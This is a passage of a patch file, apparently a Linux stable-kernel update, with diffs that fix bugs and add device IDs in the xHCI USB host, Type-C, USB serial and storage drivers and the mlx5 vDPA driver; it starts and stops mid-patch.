+index 343709af4c16f..dce02d0aad8d0 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -1170,7 +1170,10 @@ static void xhci_kill_endpoint_urbs(struct xhci_hcd *xhci,
+ 	struct xhci_virt_ep *ep;
+ 	struct xhci_ring *ring;
+ 
+-	ep = &xhci->devs[slot_id]->eps[ep_index];
++	ep = xhci_get_virt_ep(xhci, slot_id, ep_index);
++	if (!ep)
++		return;
++
+ 	if ((ep->ep_state & EP_HAS_STREAMS) ||
+ 			(ep->ep_state & EP_GETTING_NO_STREAMS)) {
+ 		int stream_id;
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 79d7931c048a8..2b280beb00115 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -3974,6 +3974,7 @@ static void xhci_free_dev(struct usb_hcd *hcd, struct usb_device *udev)
+ 	struct xhci_hcd *xhci = hcd_to_xhci(hcd);
+ 	struct xhci_virt_device *virt_dev;
+ 	struct xhci_slot_ctx *slot_ctx;
++	unsigned long flags;
+ 	int i, ret;
+ 
+ 	/*
+@@ -4000,7 +4001,11 @@ static void xhci_free_dev(struct usb_hcd *hcd, struct usb_device *udev)
+ 		virt_dev->eps[i].ep_state &= ~EP_STOP_CMD_PENDING;
+ 	virt_dev->udev = NULL;
+ 	xhci_disable_slot(xhci, udev->slot_id);
++
++	spin_lock_irqsave(&xhci->lock, flags);
+ 	xhci_free_virt_device(xhci, udev->slot_id);
++	spin_unlock_irqrestore(&xhci->lock, flags);
++
+ }
+ 
+ int xhci_disable_slot(struct xhci_hcd *xhci, u32 slot_id)
+@@ -5044,6 +5049,7 @@ static int xhci_enable_usb3_lpm_timeout(struct usb_hcd *hcd,
+ 			struct usb_device *udev, enum usb3_link_state state)
+ {
+ 	struct xhci_hcd	*xhci;
++	struct xhci_port *port;
+ 	u16 hub_encoded_timeout;
+ 	int mel;
+ 	int ret;
+@@ -5060,6 +5066,13 @@ static int xhci_enable_usb3_lpm_timeout(struct usb_hcd *hcd,
+ 	if (xhci_check_tier_policy(xhci, udev, state) < 0)
+ 		return USB3_LPM_DISABLED;
+ 
++	/* If connected to root port then check port can handle lpm */
++	if (udev->parent && !udev->parent->parent) {
++		port = xhci->usb3_rhub.ports[udev->portnum - 1];
++		if (port->lpm_incapable)
++			return USB3_LPM_DISABLED;
++	}
++
+ 	hub_encoded_timeout = xhci_calculate_lpm_timeout(hcd, udev, state);
+ 	mel = calculate_max_exit_latency(udev, state, hub_encoded_timeout);
+ 	if (mel < 0) {
+@@ -5119,7 +5132,7 @@ static int xhci_disable_usb3_lpm_timeout(struct usb_hcd *hcd,
+ /* Once a hub descriptor is fetched for a device, we need to update the xHC's
+  * internal data structures for the device.
+  */
+-static int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
+ 			struct usb_tt *tt, gfp_t mem_flags)
+ {
+ 	struct xhci_hcd *xhci = hcd_to_xhci(hcd);
+@@ -5219,6 +5232,7 @@ static int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
+ 	xhci_free_command(xhci, config_cmd);
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(xhci_update_hub_device);
+ 
+ static int xhci_get_frame(struct usb_hcd *hcd)
+ {
+@@ -5502,6 +5516,8 @@ void xhci_init_driver(struct hc_driver *drv,
+ 			drv->check_bandwidth = over->check_bandwidth;
+ 		if (over->reset_bandwidth)
+ 			drv->reset_bandwidth = over->reset_bandwidth;
++		if (over->update_hub_device)
++			drv->update_hub_device = over->update_hub_device;
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(xhci_init_driver);
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index c9f06c5e4e9d2..dcee7f3207add 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1735,6 +1735,7 @@ struct xhci_port {
+ 	int			hcd_portnum;
+ 	struct xhci_hub		*rhub;
+ 	struct xhci_port_cap	*port_cap;
++	unsigned int		lpm_incapable:1;
+ };
+ 
+ struct xhci_hub {
+@@ -1943,6 +1944,8 @@ struct xhci_driver_overrides {
+ 			     struct usb_host_endpoint *ep);
+ 	int (*check_bandwidth)(struct usb_hcd *, struct usb_device *);
+ 	void (*reset_bandwidth)(struct usb_hcd *, struct usb_device *);
++	int (*update_hub_device)(struct usb_hcd *hcd, struct usb_device *hdev,
++			    struct usb_tt *tt, gfp_t mem_flags);
+ };
+ 
+ #define	XHCI_CFC_DELAY		10
+@@ -2122,6 +2125,8 @@ int xhci_drop_endpoint(struct usb_hcd *hcd, struct usb_device *udev,
+ 		       struct usb_host_endpoint *ep);
+ int xhci_check_bandwidth(struct usb_hcd *hcd, struct usb_device *udev);
+ void xhci_reset_bandwidth(struct usb_hcd *hcd, struct usb_device *udev);
++int xhci_update_hub_device(struct usb_hcd *hcd, struct usb_device *hdev,
++			   struct usb_tt *tt, gfp_t mem_flags);
+ int xhci_disable_slot(struct xhci_hcd *xhci, u32 slot_id);
+ int xhci_ext_cap_init(struct xhci_hcd *xhci);
+ 
+diff --git a/drivers/usb/misc/iowarrior.c b/drivers/usb/misc/iowarrior.c
+index 988a8c02e7e24..b421f13260875 100644
+--- a/drivers/usb/misc/iowarrior.c
++++ b/drivers/usb/misc/iowarrior.c
+@@ -814,7 +814,7 @@ static int iowarrior_probe(struct usb_interface *interface,
+ 			break;
+ 
+ 		case USB_DEVICE_ID_CODEMERCS_IOW100:
+-			dev->report_size = 13;
++			dev->report_size = 12;
+ 			break;
+ 		}
+ 	}
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index d63c63942af1b..044e75ad4d20c 100644
+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -27,7 +27,10 @@
+ 
+ #include "onboard_usb_hub.h"
+ 
++static void onboard_hub_attach_usb_driver(struct work_struct *work);
++
+ static struct usb_device_driver onboard_hub_usbdev_driver;
++static DECLARE_WORK(attach_usb_driver_work, onboard_hub_attach_usb_driver);
+ 
+ /************************** Platform driver **************************/
+ 
+@@ -45,7 +48,6 @@ struct onboard_hub {
+ 	bool is_powered_on;
+ 	bool going_away;
+ 	struct list_head udev_list;
+-	struct work_struct attach_usb_driver_work;
+ 	struct mutex lock;
+ };
+ 
+@@ -271,8 +273,7 @@ static int onboard_hub_probe(struct platform_device *pdev)
+ 	 * This needs to be done deferred to avoid self-deadlocks on systems
+ 	 * with nested onboard hubs.
+ 	 */
+-	INIT_WORK(&hub->attach_usb_driver_work, onboard_hub_attach_usb_driver);
+-	schedule_work(&hub->attach_usb_driver_work);
++	schedule_work(&attach_usb_driver_work);
+ 
+ 	return 0;
+ }
+@@ -285,9 +286,6 @@ static int onboard_hub_remove(struct platform_device *pdev)
+ 
+ 	hub->going_away = true;
+ 
+-	if (&hub->attach_usb_driver_work != current_work())
+-		cancel_work_sync(&hub->attach_usb_driver_work);
+-
+ 	mutex_lock(&hub->lock);
+ 
+ 	/* unbind the USB devices to avoid dangling references to this device */
+@@ -431,13 +429,13 @@ static int __init onboard_hub_init(void)
+ {
+ 	int ret;
+ 
+-	ret = platform_driver_register(&onboard_hub_driver);
++	ret = usb_register_device_driver(&onboard_hub_usbdev_driver, THIS_MODULE);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = usb_register_device_driver(&onboard_hub_usbdev_driver, THIS_MODULE);
++	ret = platform_driver_register(&onboard_hub_driver);
+ 	if (ret)
+-		platform_driver_unregister(&onboard_hub_driver);
++		usb_deregister_device_driver(&onboard_hub_usbdev_driver);
+ 
+ 	return ret;
+ }
+@@ -447,6 +445,8 @@ static void __exit onboard_hub_exit(void)
+ {
+ 	usb_deregister_device_driver(&onboard_hub_usbdev_driver);
+ 	platform_driver_unregister(&onboard_hub_driver);
++
++	cancel_work_sync(&attach_usb_driver_work);
+ }
+ module_exit(onboard_hub_exit);
+ 
+diff --git a/drivers/usb/musb/omap2430.c b/drivers/usb/musb/omap2430.c
+index 476f55d1fec30..44a21ec865fb2 100644
+--- a/drivers/usb/musb/omap2430.c
++++ b/drivers/usb/musb/omap2430.c
+@@ -411,8 +411,10 @@ static int omap2430_probe(struct platform_device *pdev)
+ 		memset(musb_res, 0, sizeof(*musb_res) * ARRAY_SIZE(musb_res));
+ 
+ 		res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-		if (!res)
++		if (!res) {
++			ret = -EINVAL;
+ 			goto err2;
++		}
+ 
+ 		musb_res[i].start = res->start;
+ 		musb_res[i].end = res->end;
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index f6fb23620e87a..ba5638471de49 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -60,6 +60,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x0846, 0x1100) }, /* NetGear Managed Switch M4100 series, M5300 series, M7100 series */
+ 	{ USB_DEVICE(0x08e6, 0x5501) }, /* Gemalto Prox-PU/CU contactless smartcard reader */
+ 	{ USB_DEVICE(0x08FD, 0x000A) }, /* Digianswer A/S , ZigBee/802.15.4 MAC Device */
++	{ USB_DEVICE(0x0908, 0x0070) }, /* Siemens SCALANCE LPE-9000 USB Serial Console */
+ 	{ USB_DEVICE(0x0908, 0x01FF) }, /* Siemens RUGGEDCOM USB Serial Console */
+ 	{ USB_DEVICE(0x0988, 0x0578) }, /* Teraoka AD2000 */
+ 	{ USB_DEVICE(0x0B00, 0x3070) }, /* Ingenico 3070 */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index dee79c7d82d5c..6b69d05e2fb06 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -255,10 +255,16 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EP06			0x0306
+ #define QUECTEL_PRODUCT_EM05G			0x030a
+ #define QUECTEL_PRODUCT_EM060K			0x030b
++#define QUECTEL_PRODUCT_EM05G_CS		0x030c
++#define QUECTEL_PRODUCT_EM05CN_SG		0x0310
+ #define QUECTEL_PRODUCT_EM05G_SG		0x0311
++#define QUECTEL_PRODUCT_EM05CN			0x0312
++#define QUECTEL_PRODUCT_EM05G_GR		0x0313
++#define QUECTEL_PRODUCT_EM05G_RS		0x0314
+ #define QUECTEL_PRODUCT_EM12			0x0512
+ #define QUECTEL_PRODUCT_RM500Q			0x0800
+ #define QUECTEL_PRODUCT_RM520N			0x0801
++#define QUECTEL_PRODUCT_EC200U			0x0901
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
+ #define QUECTEL_PRODUCT_EC200T			0x6026
+ #define QUECTEL_PRODUCT_RM500K			0x7001
+@@ -1159,8 +1165,18 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EP06, 0xff, 0xff, 0xff),
+ 	  .driver_info = RSVD(1) | RSVD(2) | RSVD(3) | RSVD(4) | NUMEP2 },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EP06, 0xff, 0, 0) },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05CN, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05CN_SG, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_GR, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_CS, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_RS, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_SG, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+@@ -1180,6 +1196,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500K, 0xff, 0x00, 0x00) },
+diff --git a/drivers/usb/storage/uas-detect.h b/drivers/usb/storage/uas-detect.h
+index 3f720faa6f97c..d73282c0ec501 100644
+--- a/drivers/usb/storage/uas-detect.h
++++ b/drivers/usb/storage/uas-detect.h
+@@ -116,6 +116,19 @@ static int uas_use_uas_driver(struct usb_interface *intf,
+ 	if (le16_to_cpu(udev->descriptor.idVendor) == 0x0bc2)
+ 		flags |= US_FL_NO_ATA_1X;
+ 
++	/*
++	 * RTL9210-based enclosure from HIKSEMI, MD202 reportedly have issues
++	 * with UAS.  This isn't distinguishable with just idVendor and
++	 * idProduct, use manufacturer and product too.
++	 *
++	 * Reported-by: Hongling Zeng <zenghongling@kylinos.cn>
++	 */
++	if (le16_to_cpu(udev->descriptor.idVendor) == 0x0bda &&
++			le16_to_cpu(udev->descriptor.idProduct) == 0x9210 &&
++			(udev->manufacturer && !strcmp(udev->manufacturer, "HIKSEMI")) &&
++			(udev->product && !strcmp(udev->product, "MD202")))
++		flags |= US_FL_IGNORE_UAS;
++
+ 	usb_stor_adjust_quirks(udev, &flags);
+ 
+ 	if (flags & US_FL_IGNORE_UAS) {
+diff --git a/drivers/usb/storage/unusual_uas.h b/drivers/usb/storage/unusual_uas.h
+index 251778d14e2dd..c7b763d6d1023 100644
+--- a/drivers/usb/storage/unusual_uas.h
++++ b/drivers/usb/storage/unusual_uas.h
+@@ -83,13 +83,6 @@ UNUSUAL_DEV(0x0bc2, 0x331a, 0x0000, 0x9999,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_NO_REPORT_LUNS),
+ 
+-/* Reported-by: Hongling Zeng <zenghongling@kylinos.cn> */
+-UNUSUAL_DEV(0x0bda, 0x9210, 0x0000, 0x9999,
+-		"Hiksemi",
+-		"External HDD",
+-		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+-		US_FL_IGNORE_UAS),
+-
+ /* Reported-by: Benjamin Tissoires <benjamin.tissoires@redhat.com> */
+ UNUSUAL_DEV(0x13fd, 0x3940, 0x0000, 0x9999,
+ 		"Initio Corporation",
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index de66a2949e33b..80d8c6c3be369 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -419,6 +419,18 @@ static const char * const pin_assignments[] = {
+ 	[DP_PIN_ASSIGN_F] = "F",
+ };
+ 
++/*
++ * Helper function to extract a peripheral's currently supported
++ * Pin Assignments from its DisplayPort alternate mode state.
++ */
++static u8 get_current_pin_assignments(struct dp_altmode *dp)
++{
++	if (DP_CONF_CURRENTLY(dp->data.conf) == DP_CONF_DFP_D)
++		return DP_CAP_PIN_ASSIGN_DFP_D(dp->alt->vdo);
++	else
++		return DP_CAP_PIN_ASSIGN_UFP_D(dp->alt->vdo);
++}
++
+ static ssize_t
+ pin_assignment_store(struct device *dev, struct device_attribute *attr,
+ 		     const char *buf, size_t size)
+@@ -445,10 +457,7 @@ pin_assignment_store(struct device *dev, struct device_attribute *attr,
+ 		goto out_unlock;
+ 	}
+ 
+-	if (DP_CONF_CURRENTLY(dp->data.conf) == DP_CONF_DFP_D)
+-		assignments = DP_CAP_UFP_D_PIN_ASSIGN(dp->alt->vdo);
+-	else
+-		assignments = DP_CAP_DFP_D_PIN_ASSIGN(dp->alt->vdo);
++	assignments = get_current_pin_assignments(dp);
+ 
+ 	if (!(DP_CONF_GET_PIN_ASSIGN(conf) & assignments)) {
+ 		ret = -EINVAL;
+@@ -485,10 +494,7 @@ static ssize_t pin_assignment_show(struct device *dev,
+ 
+ 	cur = get_count_order(DP_CONF_GET_PIN_ASSIGN(dp->data.conf));
+ 
+-	if (DP_CONF_CURRENTLY(dp->data.conf) == DP_CONF_DFP_D)
+-		assignments = DP_CAP_UFP_D_PIN_ASSIGN(dp->alt->vdo);
+-	else
+-		assignments = DP_CAP_DFP_D_PIN_ASSIGN(dp->alt->vdo);
++	assignments = get_current_pin_assignments(dp);
+ 
+ 	for (i = 0; assignments; assignments >>= 1, i++) {
+ 		if (assignments & 1) {
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 904c7b4ce2f0c..59b366b5c6144 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -4594,14 +4594,13 @@ static void run_state_machine(struct tcpm_port *port)
+ 		tcpm_set_state(port, ready_state(port), 0);
+ 		break;
+ 	case DR_SWAP_CHANGE_DR:
+-		if (port->data_role == TYPEC_HOST) {
+-			tcpm_unregister_altmodes(port);
++		tcpm_unregister_altmodes(port);
++		if (port->data_role == TYPEC_HOST)
+ 			tcpm_set_roles(port, true, port->pwr_role,
+ 				       TYPEC_DEVICE);
+-		} else {
++		else
+ 			tcpm_set_roles(port, true, port->pwr_role,
+ 				       TYPEC_HOST);
+-		}
+ 		tcpm_ams_finish(port);
+ 		tcpm_set_state(port, ready_state(port), 0);
+ 		break;
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 6af9fdbb86b7a..058fbe28107e9 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -116,8 +116,9 @@ int mlx5_vdpa_create_mkey(struct mlx5_vdpa_dev *mvdev, u32 *mkey, u32 *in,
+ 			  int inlen);
+ int mlx5_vdpa_destroy_mkey(struct mlx5_vdpa_dev *mvdev, u32 mkey);
+ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
+-			     bool *change_map);
+-int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb);
++			     bool *change_map, unsigned int asid);
++int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
++			unsigned int asid);
+ void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev);
+ 
+ #define mlx5_vdpa_warn(__dev, format, ...)                                                         \
+diff --git a/drivers/vdpa/mlx5/core/mr.c b/drivers/vdpa/mlx5/core/mr.c
+index a639b9208d414..a4d7ee2339fa5 100644
+--- a/drivers/vdpa/mlx5/core/mr.c
++++ b/drivers/vdpa/mlx5/core/mr.c
+@@ -511,7 +511,8 @@ out:
+ 	mutex_unlock(&mr->mkey_mtx);
+ }
+ 
+-static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev,
++				struct vhost_iotlb *iotlb, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 	int err;
+@@ -519,42 +520,49 @@ static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb
+ 	if (mr->initialized)
+ 		return 0;
+ 
+-	if (iotlb)
+-		err = create_user_mr(mvdev, iotlb);
+-	else
+-		err = create_dma_mr(mvdev, mr);
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
++		if (iotlb)
++			err = create_user_mr(mvdev, iotlb);
++		else
++			err = create_dma_mr(mvdev, mr);
+ 
+-	if (err)
+-		return err;
++		if (err)
++			return err;
++	}
+ 
+-	err = dup_iotlb(mvdev, iotlb);
+-	if (err)
+-		goto out_err;
++	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] == asid) {
++		err = dup_iotlb(mvdev, iotlb);
++		if (err)
++			goto out_err;
++	}
+ 
+ 	mr->initialized = true;
+ 	return 0;
+ 
+ out_err:
+-	if (iotlb)
+-		destroy_user_mr(mvdev, mr);
+-	else
+-		destroy_dma_mr(mvdev, mr);
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
++		if (iotlb)
++			destroy_user_mr(mvdev, mr);
++		else
++			destroy_dma_mr(mvdev, mr);
++	}
+ 
+ 	return err;
+ }
+ 
+-int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
++			unsigned int asid)
+ {
+ 	int err;
+ 
+ 	mutex_lock(&mvdev->mr.mkey_mtx);
+-	err = _mlx5_vdpa_create_mr(mvdev, iotlb);
++	err = _mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	mutex_unlock(&mvdev->mr.mkey_mtx);
+ 	return err;
+ }
+ 
+ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
+-			     bool *change_map)
++			     bool *change_map, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 	int err = 0;
+@@ -566,7 +574,7 @@ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *io
+ 		*change_map = true;
+ 	}
+ 	if (!*change_map)
+-		err = _mlx5_vdpa_create_mr(mvdev, iotlb);
++		err = _mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	mutex_unlock(&mr->mkey_mtx);
+ 
+ 	return err;
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 444d6572b2d05..3a6dbbc6440d4 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -1823,6 +1823,9 @@ static virtio_net_ctrl_ack handle_ctrl_vlan(struct mlx5_vdpa_dev *mvdev, u8 cmd)
+ 	size_t read;
+ 	u16 id;
+ 
++	if (!(ndev->mvdev.actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VLAN)))
++		return status;
++
+ 	switch (cmd) {
+ 	case VIRTIO_NET_CTRL_VLAN_ADD:
+ 		read = vringh_iov_pull_iotlb(&cvq->vring, &cvq->riov, &vlan, sizeof(vlan));
+@@ -2391,7 +2394,8 @@ static void restore_channels_info(struct mlx5_vdpa_net *ndev)
+ 	}
+ }
+ 
+-static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
++				struct vhost_iotlb *iotlb, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_net *ndev = to_mlx5_vdpa_ndev(mvdev);
+ 	int err;
+@@ -2403,7 +2407,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb
+ 
+ 	teardown_driver(ndev);
+ 	mlx5_vdpa_destroy_mr(mvdev);
+-	err = mlx5_vdpa_create_mr(mvdev, iotlb);
++	err = mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	if (err)
+ 		goto err_mr;
+ 
+@@ -2584,7 +2588,7 @@ static int mlx5_vdpa_reset(struct vdpa_device *vdev)
+ 	++mvdev->generation;
+ 
+ 	if (MLX5_CAP_GEN(mvdev->mdev, umem_uid_0)) {
+-		if (mlx5_vdpa_create_mr(mvdev, NULL))
++		if (mlx5_vdpa_create_mr(mvdev, NULL, 0))
+ 			mlx5_vdpa_warn(mvdev, "create MR failed\n");
+ 	}
+ 	up_write(&ndev->reslock);
+@@ -2620,41 +2624,20 @@ static u32 mlx5_vdpa_get_generation(struct vdpa_device *vdev)
+ 	return mvdev->generation;
+ }
+ 
+-static int set_map_control(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
+-{
+-	u64 start = 0ULL, last = 0ULL - 1;
+-	struct vhost_iotlb_map *map;
+-	int err = 0;
+-
+-	spin_lock(&mvdev->cvq.iommu_lock);
+-	vhost_iotlb_reset(mvdev->cvq.iotlb);
+-
+-	for (map = vhost_iotlb_itree_first(iotlb, start, last); map;
+-	     map = vhost_iotlb_itree_next(map, start, last)) {
+-		err = vhost_iotlb_add_range(mvdev->cvq.iotlb, map->start,
+-					    map->last, map->addr, map->perm);
+-		if (err)
+-			goto out;
+-	}
+-
+-out:
+-	spin_unlock(&mvdev->cvq.iommu_lock);
+-	return err;
+-}
+-
+-static int set_map_data(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++static int set_map_data(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
++			unsigned int asid)
+ {
+ 	bool change_map;
+ 	int err;
+ 
+-	err = mlx5_vdpa_handle_set_map(mvdev, iotlb, &change_map);
++	err = mlx5_vdpa_handle_set_map(mvdev, iotlb, &change_map, asid);
+ 	if (err) {
+ 		mlx5_vdpa_warn(mvdev, "set map failed(%d)\n", err);
+ 		return err;
+ 	}
+ 
+ 	if (change_map)
+-		err = mlx5_vdpa_change_map(mvdev, iotlb);
++		err = mlx5_vdpa_change_map(mvdev, iotlb, asid);
+ 
+ 	return err;
+ }
+@@ -2667,16 +2650,7 @@ static int mlx5_vdpa_set_map(struct vdpa_device *vdev, unsigned int asid,
+ 	int err = -EINVAL;
+ 
+ 	down_write(&ndev->reslock);
+-	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
+-		err = set_map_data(mvdev, iotlb);
+-		if (err)
+-			goto out;
+-	}
+-
+-	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] == asid)
+-		err = set_map_control(mvdev, iotlb);
+-
+-out:
++	err = set_map_data(mvdev, iotlb, asid);
+ 	up_write(&ndev->reslock);
+ 	return err;
+ }
+@@ -2842,8 +2816,8 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 	int i;
+ 
+ 	down_write(&ndev->reslock);
+-	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 	ndev->nb_registered = false;
++	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 	flush_workqueue(ndev->mvdev.wq);
+ 	for (i = 0; i < ndev->cur_num_vqs; i++) {
+ 		mvq = &ndev->vqs[i];
+@@ -3021,7 +2995,7 @@ static void update_carrier(struct work_struct *work)
+ 	else
+ 		ndev->config.status &= cpu_to_mlx5vdpa16(mvdev, ~VIRTIO_NET_S_LINK_UP);
+ 
+-	if (ndev->config_cb.callback)
++	if (ndev->nb_registered && ndev->config_cb.callback)
+ 		ndev->config_cb.callback(ndev->config_cb.private);
+ 
+ 	kfree(wqent);
+@@ -3038,21 +3012,13 @@ static int event_handler(struct notifier_block *nb, unsigned long event, void *p
+ 		switch (eqe->sub_type) {
+ 		case MLX5_PORT_CHANGE_SUBTYPE_DOWN:
+ 		case MLX5_PORT_CHANGE_SUBTYPE_ACTIVE:
+-			down_read(&ndev->reslock);
+-			if (!ndev->nb_registered) {
+-				up_read(&ndev->reslock);
+-				return NOTIFY_DONE;
+-			}
+ 			wqent = kzalloc(sizeof(*wqent), GFP_ATOMIC);
+-			if (!wqent) {
+-				up_read(&ndev->reslock);
++			if (!wqent)
+ 				return NOTIFY_DONE;
+-			}
+ 
+ 			wqent->mvdev = &ndev->mvdev;
+ 			INIT_WORK(&wqent->work, update_carrier);
+ 			queue_work(ndev->mvdev.wq, &wqent->work);
+-			up_read(&ndev->reslock);
+ 			ret = NOTIFY_OK;
+ 			break;
+ 		default:
+@@ -3187,7 +3153,7 @@ static int mlx5_vdpa_dev_add(struct vdpa_mgmt_dev *v_mdev, const char *name,
+ 		goto err_mpfs;
+ 
+ 	if (MLX5_CAP_GEN(mvdev->mdev, umem_uid_0)) {
+-		err = mlx5_vdpa_create_mr(mvdev, NULL);
